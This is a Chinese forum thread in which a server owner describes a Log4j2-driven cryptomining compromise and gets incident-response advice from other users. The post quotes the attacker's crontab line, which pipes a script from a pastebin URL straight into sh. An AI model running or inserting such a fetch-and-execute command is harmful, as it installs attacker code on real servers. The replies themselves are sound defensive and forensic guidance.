服务器被挖矿,找到相关文件及计划任务, google 过关键词得知是 Log4j2 漏洞导致被入侵,想知道该病毒运行的逻辑,找不到相关 sh 文件,求大佬指点。
callmebigfaceman 2022-04-06 17:07:22 +08:00 4026 次点击这是一个创建于 1372 天前的主题,其中的信息可能已经有所发展或是发生改变。
环境介绍: 1 、redhat 6.3 2 、对外开启了 9000:80 端口的映射 3 、强密码验证(限制指定 IP 通过 ssh 连接)
已知信息: 1 、crontab -l 得知被添加了计划任务:curl -fsSL https://pastebin.com/raw/8DdBvkRn | sh (我尝试得到该脚本,但是请求出来只是字符串‘#endif’,我该如何得到该病毒脚本? top 查看进程时候有看到 /tmp/.mimu/apache.sh ,但是实际去查看该病毒目录,并没有发现脚本,是否加载在内存中,实际脚本已被删除?) https://imgur.com/Huflmd7 https://imgur.com/2PZNjXR
2 、已知该脚本会生成隐藏目录 /tmp/.mimu/,下面包含挖矿程序 kthmimu 及配置文件 config.json https://imgur.com/Huflmd7
已自行尝试复现的测试: 1 、尝试 curl -fsSL https://pastebin.com/raw/8DdBvkRn | sh ,但是我并没有发现脚本文件及复现
求助: 1 、如何找出该脚本及实现逻辑? 2 、如何防范?
 | 1 MilkShake 2022-04-06 17:14:42 +08:00 你的项目是在宿主机运行还是容器内,如果是在容器内,去容器的目录下看看。 |
 | 2 callmebigfaceman OP @aaa5838769 宿主机内 |
 | 3 Jinnyu 2022-04-06 17:34:35 +08:00 看样子应该是 https://pastebin.com/raw/8DdBvkRn 被访问后, 服务端删除了里边的内容, 防止脚本内容泄露 可以分析下 apache.sh 的脚本内容 看看都连接了哪些端口 1. 先禁止下端口访问 2. 通过 chattr 修改文件权限, 禁止写入 /tmp/.mimu 3. 复查所有常用二进制文件 MD5 (cd, mv, cp, ps, ls, top 等) |
 | 4 polaa 2022-04-06 17:56:49 +08:00 1.检测是否存在自启动脚本 2. 尝试恢复删除的脚本 关键词 recover deleted file active process recover deleted file |
 | 5 defunct9 2022-04-06 18:03:05 +08:00 保护现场不够啊。 |
 | 6 defunct9 2022-04-06 18:03:16 +08:00  6 开 ssh ,让我上去看看 |
 | 7 meetcw 2022-04-06 18:35:41 +08:00 进程没关掉的话可以通过 proc/{pid}/exe 文件恢复执行文件,另外 proc/{pid}/fd 下是这个进程打开的文件。 |
 | 8 wd 2022-04-06 19:19:44 +08:00 via iPhone 别折腾了,遇到这样的一般就重建吧,你不知道对方埋了多少后门的。 |
 | 9 idragonet 2022-04-06 20:32:52 +08:00 今晚我的腾讯云服务器也收到服务器被挖矿警告了。 |
| 10 callmebigfaceman OP @Jinnyu 1 、2 都已做了,我仔细查查 3 ,感谢 |
| 11 callmebigfaceman OP @polaa 1.已检查自启动的相关项目 2.我尝试一下,感谢 |
| 12 callmebigfaceman OP @defunct9 现场已经被我清理过了,不是很方便提供 ssh ,不好意思。 |
| 13 callmebigfaceman OP @meetcw 被我关了,exe 是 /bin/sh |
| 14 callmebigfaceman OP @wd 主要想了解它如何实现的 |
Select Language